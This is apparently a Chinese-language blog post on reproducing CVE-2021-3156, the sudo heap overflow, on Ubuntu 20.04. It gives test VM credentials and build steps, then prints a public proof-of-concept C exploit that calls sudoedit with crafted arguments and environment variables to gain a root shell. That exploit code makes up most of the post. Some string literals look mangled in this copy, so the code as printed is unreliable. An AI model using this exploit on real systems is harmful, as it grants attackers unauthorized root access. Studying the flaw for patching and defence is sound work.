目前exp在ubuntu 20.04环境下稳定运行,其他linux发行版未测试
环境已经上传至百度云盘中,请关注公众号并后台回复sudo获取下载链接。
虚拟机的用户名密码为 vagrant/unicodesec
复现过程
根目录中进入CVE-2021-3156文件夹中,执行make编译项目,随后执行sudo-hax-me-a-sandwich
过程如下图所示
exp代码如下
int main(int argc, char *argv[]) {
// CTF quality exploit below.
char *s_argv[]={
"sudoedit",
"-u", "root", "-s",
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",
"\",
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\",
NULL
};
char *s_envp[]={
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\",
"X/P0P_SH3LLZ_", "\",
"LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
NULL
};
printf("**** CVE-2021-3156 PoC by blasty <peter@haxx.in>
");
execve(SUDOEDIT_PATH, s_argv, s_envp);
return 0;
}
